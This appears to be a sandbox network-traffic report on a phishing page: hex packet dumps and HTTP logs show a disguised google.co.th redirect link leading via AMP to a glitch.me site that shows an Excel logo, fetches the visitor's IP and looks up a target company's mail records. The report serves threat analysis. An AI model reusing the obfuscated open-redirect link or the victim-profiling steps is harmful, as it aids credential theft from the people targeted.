                                  Data Ascii: 1X75cc237Ad128c11770CF2284D83585D2F27fX23690eaP946ef3b8DX3(160Y3fe65Y8!36AbdS86fC4236dd6fc69C0176eC51c73CA2178CF26d7e174d01D75dff8359Cfe2491e83f96ed449Yf2A68ae14eA5fc53AAQ158AF1567b433A7fa54AC1015YF1773YD116Dbdcd2e8Abc2980d72e85dc338aXF80D4278
                                  Jan 6, 2025 04:56:19.589776039 CET776INData Raw: 37 32 63 66 31 33 37 32 43 58 31 63 38 30 38 35 58 36 34 32 37 34 58 31 33 38 38 66 58 36 33 44 39 34 58 59 34 32 41 37 33 33 39 36 58 43 34 39 38 44 58 43 34 38 39 36 46 41 46 46 62 31 39 37 4c 34 35 59 62 32 4d 39 36 30 59 37 5b 58 36 35 62 63
                                  Data Ascii: 72cf1372CX1c8085X64274X1388fX63D94XY42A73396XC498DXC4896FAFFb197L45Yb2M960Y7[X65bc136aC168be1966C81471C7XA27D01a78C42e7aDX245177e43Y92X94097XX459cF34Aa1525CXF4Y98F05A73Y018799F!C63ba1168bf166dc41b72C964C02175c814839bD875d2228CA6cc3990e73X95XC4
                                  Jan 6, 2025 04:56:19.589791059 CET1236INData Raw: 31 30 36 33 61 65 31 35 36 38 62 33 31 41 36 46 63 62 31 38 38 31 61 37 31 34 36 62 63 32 31 39 37 30 63 37 31 58 37 35 43 43 32 33 37 41 44 31 37 37 64 35 31 62 37 66 43 41 32 37 38 31 65 30 66 61 33 37 64 36 32 58 38 30 44 37 32 66 38 66 62 33
                                  Data Ascii: 1063ae1568b31A6Fcb1881a7146bc21970c71X75CC237AD177d51b7fCA2781e0fa37d62X80D72f8fb3d9469dF44Ya2F950a75Y3F96:35aY1+85fY6*d64CA1C69F363b7-965C11121CC147ed1d46cD0227dC8327edb313A9YF72996ed449Yf249a0F75Cf8489CXX4665f8545d,FF562b91067be156cC31A71c81
                                  Jan 6, 2025 04:56:19.589802027 CET1236INData Raw: 35 58 37 38 39 58 56 59 36 32 59 39 31 30 36 37 62 65 31 35 36 43 32 30 3b 34 35 62 63 38 31 46 37 36 63 64 32 34 37 59 64 32 32 39 38 65 32 33 37 44 63 63 32 35 38 31 39 37 32 39 37 44 44 30 32 41 38 32 58 36 58 59 38 41 61 61 66 30 41 32 38 38
                                  Data Ascii: 5X789XVY62Y91067be156C20;45bc81F76cd247Yd2298e237Dcc258197297DD02A82X6XY8Aaaf0A288F54cA3FA51A8ff56AD#45YY24fAFR56272SF5CC4:6326FD82Dc4233d63d0277Xd52C83DA3188DF368d2a8AX03D4dXX338XX33b9Xbbf89dF54fa1ec4X749a)75eY5Qc63YA1168YF166Dc45ec1156FC9e82
                                  Jan 6, 2025 04:56:19.589812040 CET1236INData Raw: 4f 63 36 33 62 61 35 37 62 37 2b 64 36 61 37 61 31 37 36 34 43 43 2e 65 33 61 37 37 65 30 33 37 63 63 32 59 34 35 36 62 64 38 32 46 38 36 64 64 33 34 38 62 58 32 33 39 39 30 58 37 33 58 39 35 32 66 39 32 65 36 34 30 39 61 59 39 46 36 35 30 62 37
                                  Data Ascii: Oc63ba57b7+d6a7a1764CC.e3a77e037cc2Y456bd82F86dd348bX23990X73X952f92e6409aY9F650b7&X65c4ea57ae*55Cb3%a61Y8^f66bd14bfJ771C4D45FC1156aC8XY28cb1Y73D8f61c89e0378ee53c93XA4198ef46F43D8Ff6416Aa7;f65bc]8759b|85FY6PD64bb1269c0176ec569b41C68c11D33YF237
                                  Jan 6, 2025 04:56:19.594655991 CET1236INData Raw: 31 32 36 39 63 30 31 37 36 58 43 35 31 63 37 33 43 41 36 65 62 39 32 31 36 44 43 36 32 32 34 35 38 32 58 41 34 30 64 37 33 36 33 35 39 43 46 58 32 34 39 31 58 38 33 46 39 36 58 44 34 34 39 59 66 32 34 39 41 30 46 37 34 58 58 37 34 59 41 35 65 65
                                  Data Ascii: 1269c0176XC51c73CA6eb9216DC6224582XA40d736359CFX2491X83F96XD449Yf249A0F74XX74YA5ee46AAc9)6AY@359a7D4FA67YX156CC31A71C81F76cd24bd217Yc41C80921e82de3587dc[03da53Y9A994396XA3X90A3fd65bb1366C114769C~960b7GX65bc136Ac1186fc663C31976862370D81a4683XY4


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.449739142.250.185.994431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-06 03:56:18 UTC1059OUTGET /url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F HTTP/1.1
                                  Host: www.google.co.th
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  sec-ch-ua-platform: "Windows"
                                  Upgrade-Insecure-Requests: 1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: navigate
                                  Sec-Fetch-User: ?1
                                  Sec-Fetch-Dest: document
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-06 03:56:18 UTC1017INHTTP/1.1 302 Found
                                  Location: https://www.google.co.th/amp/phil-health-uk.glitch.me/
                                  Cache-Control: private
                                  Content-Type: text/html; charset=UTF-8
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-0ibZDJpmJiZoVBr8RvUPaQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                  Permissions-Policy: unload=()
                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                  Date: Mon, 06 Jan 2025 03:56:18 GMT
                                  Server: gws
                                  Content-Length: 251
                                  X-XSS-Protection: 0
                                  Set-Cookie: NID=520=mEog8veEf-llT1OPgOyCvqwf8IaUxQqOuR6BXL6_Qlq3QpVf_wvmBMEeIHJ0JxplLNtw3ZmaIE59eFMohc2GiZOrAX31aU6BZM_9kMIrJWoFIncjTz44Z2pCSlqzaeL4uplsBceDTKck9ocwVpX0jmBp4ww75nbL1_L7EKr4wPLuA3jbfdMsvoVulK0FbjWrS6QP7w; expires=Tue, 08-Jul-2025 03:56:18 GMT; path=/; domain=.google.co.th; Secure; HttpOnly; SameSite=none
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close
                                  2025-01-06 03:56:18 UTC251INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 74 68 2f 61 6d 70 2f 70 68 69 6c 2d 68 65 61 6c 74 68 2d 75 6b 2e 67 6c 69 74 63 68 2e 6d 65 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.co.th/amp/phil-health-uk.glitch.me/">here</A>.</BODY></HTML>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.449740142.250.185.994431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-06 03:56:18 UTC1049OUTGET /amp/phil-health-uk.glitch.me/ HTTP/1.1
                                  Host: www.google.co.th
                                  Connection: keep-alive
                                  Upgrade-Insecure-Requests: 1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: navigate
                                  Sec-Fetch-User: ?1
                                  Sec-Fetch-Dest: document
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  sec-ch-ua-platform: "Windows"
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  Cookie: NID=520=mEog8veEf-llT1OPgOyCvqwf8IaUxQqOuR6BXL6_Qlq3QpVf_wvmBMEeIHJ0JxplLNtw3ZmaIE59eFMohc2GiZOrAX31aU6BZM_9kMIrJWoFIncjTz44Z2pCSlqzaeL4uplsBceDTKck9ocwVpX0jmBp4ww75nbL1_L7EKr4wPLuA3jbfdMsvoVulK0FbjWrS6QP7w
                                  2025-01-06 03:56:19 UTC801INHTTP/1.1 302 Found
                                  Location: http://phil-health-uk.glitch.me/
                                  Cache-Control: private
                                  X-Robots-Tag: noindex
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-zy2Ww-5jsZ4nFH81-mbgBg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                  Permissions-Policy: unload=()
                                  Date: Mon, 06 Jan 2025 03:56:18 GMT
                                  Server: gws
                                  Content-Length: 229
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close
                                  2025-01-06 03:56:19 UTC229INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 70 68 69 6c 2d 68 65 61 6c 74 68 2d 75 6b 2e 67 6c 69 74 63 68 2e 6d 65 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://phil-health-uk.glitch.me/">here</A>.</BODY></HTML>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.449743185.15.59.2404431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-06 03:56:20 UTC696OUTGET /wikipedia/commons/thumb/7/73/Microsoft_Excel_2013-2019_logo.svg/1200px-Microsoft_Excel_2013-2019_logo.svg.png HTTP/1.1
                                  Host: upload.wikimedia.org
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: http://phil-health-uk.glitch.me/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-06 03:56:20 UTC1074INHTTP/1.1 200 OK
                                  content-type: image/png
                                  content-disposition: inline;filename*=UTF-8''Microsoft_Excel_2013-2019_logo.svg.png
                                  last-modified: Wed, 17 Jul 2024 04:34:52 GMT
                                  content-length: 28424
                                  date: Sun, 05 Jan 2025 17:18:45 GMT
                                  server: envoy
                                  etag: 75b3ed4a1d236d18ce66e74d99117b3a
                                  age: 38254
                                  x-cache: cp3075 hit, cp3075 hit/52
                                  x-cache-status: hit-front
                                  server-timing: cache;desc="hit-front", host;desc="cp3075"
                                  strict-transport-security: max-age=106384710; includeSubDomains; preload
                                  report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                  nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                  x-client-ip: 8.46.123.189
                                  x-content-type-options: nosniff
                                  access-control-allow-origin: *
                                  access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                  timing-allow-origin: *
                                  accept-ranges: bytes
                                  connection: close
                                  2025-01-06 03:56:20 UTC13823INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 b0 00 00 04 6d 08 06 00 00 00 45 81 bc 3e 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 07 74 49 4d 45 07 e8 07 11 04 22 33 73 2d 50 4f 00 00 6e 0c 49 44 41 54 78 da ec fd 77 9c d5 f5 9d ff 7f bf 3e 67 06 06 18 8a 20 2a a2 20 a0 22 ce 28 16 04 6c 20 4a 11 35 b6 c4 de 4d b2 d9 4d 36 26 26 9b ef ee fe 7e d7 ed fa 5d d9 df f5 bd 5d df df f7 bb 25 c9 ee 66 37 df 6c ec 2d 26 16 14 3b 56 aa 28 f6 de b1 8b 34 e9 6d e6 7c ae 3f 14 2b 65 fa bc cf 39 f7 fb ed 96 15 86 29 67 9e 9f c3 70 e6 b1 9f f3 99 2c 00 00 a0 93
                                  Data Ascii: PNGIHDRmE>gAMAa cHRMz&u0`:pQ<bKGDtIME"3s-POnIDATxw>g * "(l J5MM6&&~]]%f7l-&;V(4m|?+e9)gp,
                                  2025-01-06 03:56:20 UTC14601INData Raw: a0 4c 09 58 c0 16 6d 6c d8 14 d7 cd bb d3 10 25 e0 8d 8f df 8d 7b 9f 9d 6d 08 00 00 a0 6c 09 58 c0 56 5d 33 67 7a 6c 68 d8 68 88 c4 fd 76 c6 f5 51 74 f6 15 00 00 50 c6 04 2c 60 ab 96 ae fe 24 6e 7b f2 21 43 24 ec 9d a5 1f c6 ed 8e 11 00 00 50 e6 04 2c 60 9b 2e 7b e4 66 d7 56 4a d8 ef 1e bc 31 1a 8a 8d 86 00 00 00 ca 9a 80 05 6c d3 2b 1f 2d 8c 39 af 3d 65 88 04 7d bc 72 59 dc fc f8 0c 43 00 00 00 65 4f c0 02 b6 eb b2 99 b7 18 21 41 bf 7b f0 46 d7 28 03 00 00 2a 82 80 05 6c d7 c3 2f 3f 1e af 2f 7a c7 10 09 59 be 66 65 dc 38 ff 6e 43 00 00 00 15 41 c0 02 b6 2b cf f3 b8 62 f6 34 43 24 e4 0f 8f dc 14 6b 36 ac 33 04 00 00 50 11 04 2c a0 49 6e 59 30 23 96 af 59 69 88 04 ac 5e bf 36 ae 99 33 dd 10 00 00 40 c5 10 b0 80 26 59 b7 71 43 5c ff e8 9d 86 48 c0 15 b3 6e
                                  Data Ascii: LXml%{mlXV]3gzlhhvQtP,`$n{!C$P,`.{fVJ1l+-9=e}rYCeO!A{F(*l/?/zYfe8nCA+b4C$k63P,InY0#Yi^63@&YqC\Hn


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.449748185.15.59.2404431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-06 03:56:21 UTC453OUTGET /wikipedia/commons/thumb/7/73/Microsoft_Excel_2013-2019_logo.svg/1200px-Microsoft_Excel_2013-2019_logo.svg.png HTTP/1.1
                                  Host: upload.wikimedia.org
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-06 03:56:21 UTC1074INHTTP/1.1 200 OK
                                  content-type: image/png
                                  content-disposition: inline;filename*=UTF-8''Microsoft_Excel_2013-2019_logo.svg.png
                                  last-modified: Wed, 17 Jul 2024 04:34:52 GMT
                                  content-length: 28424
                                  date: Sun, 05 Jan 2025 17:18:45 GMT
                                  server: envoy
                                  etag: 75b3ed4a1d236d18ce66e74d99117b3a
                                  age: 38256
                                  x-cache: cp3075 hit, cp3075 hit/53
                                  x-cache-status: hit-front
                                  server-timing: cache;desc="hit-front", host;desc="cp3075"
                                  strict-transport-security: max-age=106384710; includeSubDomains; preload
                                  report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                  nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                  x-client-ip: 8.46.123.189
                                  x-content-type-options: nosniff
                                  access-control-allow-origin: *
                                  access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                  timing-allow-origin: *
                                  accept-ranges: bytes
                                  connection: close
                                  2025-01-06 03:56:21 UTC13823INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 b0 00 00 04 6d 08 06 00 00 00 45 81 bc 3e 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 07 74 49 4d 45 07 e8 07 11 04 22 33 73 2d 50 4f 00 00 6e 0c 49 44 41 54 78 da ec fd 77 9c d5 f5 9d ff 7f bf 3e 67 06 06 18 8a 20 2a a2 20 a0 22 ce 28 16 04 6c 20 4a 11 35 b6 c4 de 4d b2 d9 4d 36 26 26 9b ef ee fe 7e d7 ed fa 5d d9 df f5 bd 5d df df f7 bb 25 c9 ee 66 37 df 6c ec 2d 26 16 14 3b 56 aa 28 f6 de b1 8b 34 e9 6d e6 7c ae 3f 14 2b 65 fa bc cf 39 f7 fb ed 96 15 86 29 67 9e 9f c3 70 e6 b1 9f f3 99 2c 00 00 a0 93
                                  Data Ascii: PNGIHDRmE>gAMAa cHRMz&u0`:pQ<bKGDtIME"3s-POnIDATxw>g * "(l J5MM6&&~]]%f7l-&;V(4m|?+e9)gp,
                                  2025-01-06 03:56:22 UTC14601INData Raw: a0 4c 09 58 c0 16 6d 6c d8 14 d7 cd bb d3 10 25 e0 8d 8f df 8d 7b 9f 9d 6d 08 00 00 a0 6c 09 58 c0 56 5d 33 67 7a 6c 68 d8 68 88 c4 fd 76 c6 f5 51 74 f6 15 00 00 50 c6 04 2c 60 ab 96 ae fe 24 6e 7b f2 21 43 24 ec 9d a5 1f c6 ed 8e 11 00 00 50 e6 04 2c 60 9b 2e 7b e4 66 d7 56 4a d8 ef 1e bc 31 1a 8a 8d 86 00 00 00 ca 9a 80 05 6c d3 2b 1f 2d 8c 39 af 3d 65 88 04 7d bc 72 59 dc fc f8 0c 43 00 00 00 65 4f c0 02 b6 eb b2 99 b7 18 21 41 bf 7b f0 46 d7 28 03 00 00 2a 82 80 05 6c d7 c3 2f 3f 1e af 2f 7a c7 10 09 59 be 66 65 dc 38 ff 6e 43 00 00 00 15 41 c0 02 b6 2b cf f3 b8 62 f6 34 43 24 e4 0f 8f dc 14 6b 36 ac 33 04 00 00 50 11 04 2c a0 49 6e 59 30 23 96 af 59 69 88 04 ac 5e bf 36 ae 99 33 dd 10 00 00 40 c5 10 b0 80 26 59 b7 71 43 5c ff e8 9d 86 48 c0 15 b3 6e
                                  Data Ascii: LXml%{mlXV]3gzlhhvQtP,`$n{!C$P,`.{fVJ1l+-9=e}rYCeO!A{F(*l/?/zYfe8nCA+b4C$k63P,InY0#Yi^63@&YqC\Hn


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.449761172.67.74.1524431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-06 03:56:33 UTC569OUTGET /?format=json HTTP/1.1
                                  Host: api.ipify.org
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: */*
                                  Origin: http://phil-health-uk.glitch.me
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: http://phil-health-uk.glitch.me/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-06 03:56:33 UTC463INHTTP/1.1 200 OK
                                  Date: Mon, 06 Jan 2025 03:56:33 GMT
                                  Content-Type: application/json
                                  Content-Length: 21
                                  Connection: close
                                  Access-Control-Allow-Origin: *
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8fd8c7668b7ac35b-EWR
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1698&min_rtt=1694&rtt_var=643&sent=3&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1147&delivery_rate=1691772&cwnd=188&unsent_bytes=0&cid=fe933d77932506f3&ts=130&x=0"
                                  2025-01-06 03:56:33 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                  Data Ascii: {"ip":"8.46.123.189"}


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.449762172.67.74.1524431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-06 03:56:34 UTC349OUTGET /?format=json HTTP/1.1
                                  Host: api.ipify.org
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-06 03:56:34 UTC430INHTTP/1.1 200 OK
                                  Date: Mon, 06 Jan 2025 03:56:34 GMT
                                  Content-Type: application/json
                                  Content-Length: 21
                                  Connection: close
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8fd8c76a3e4a4304-EWR
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1727&min_rtt=1721&rtt_var=658&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=927&delivery_rate=1646926&cwnd=248&unsent_bytes=0&cid=02298a6a50ee44f6&ts=151&x=0"
                                  2025-01-06 03:56:34 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                  Data Ascii: {"ip":"8.46.123.189"}


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  6192.168.2.4497638.8.4.44431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-06 03:56:34 UTC594OUTGET /resolve?name=hyundaielevator.com&type=MX HTTP/1.1
                                  Host: dns.google
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: */*
                                  Origin: http://phil-health-uk.glitch.me
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: http://phil-health-uk.glitch.me/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-06 03:56:34 UTC548INHTTP/1.1 200 OK
                                  X-Content-Type-Options: nosniff
                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                  Access-Control-Allow-Origin: *
                                  Date: Mon, 06 Jan 2025 03:56:34 GMT
                                  Expires: Mon, 06 Jan 2025 03:56:34 GMT
                                  Cache-Control: private, max-age=3600
                                  Content-Type: application/json; charset=UTF-8
                                  Server: HTTP server (unknown)
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Accept-Ranges: none
                                  Vary: Accept-Encoding
                                  Connection: close
                                  Transfer-Encoding: chunked
                                  2025-01-06 03:56:34 UTC271INData Raw: 31 30 38 0d 0a 7b 22 53 74 61 74 75 73 22 3a 30 2c 22 54 43 22 3a 66 61 6c 73 65 2c 22 52 44 22 3a 74 72 75 65 2c 22 52 41 22 3a 74 72 75 65 2c 22 41 44 22 3a 66 61 6c 73 65 2c 22 43 44 22 3a 66 61 6c 73 65 2c 22 51 75 65 73 74 69 6f 6e 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 68 79 75 6e 64 61 69 65 6c 65 76 61 74 6f 72 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 35 7d 5d 2c 22 41 6e 73 77 65 72 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 68 79 75 6e 64 61 69 65 6c 65 76 61 74 6f 72 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 35 2c 22 54 54 4c 22 3a 33 36 30 30 2c 22 64 61 74 61 22 3a 22 31 30 20 6d 61 69 6c 69 6e 2e 68 79 75 6e 64 61 69 67 72 6f 75 70 2e 63 6f 6d 2e 22 7d 5d 2c 22 43 6f 6d 6d 65 6e 74 22 3a 22 52 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 32 30 35 2e
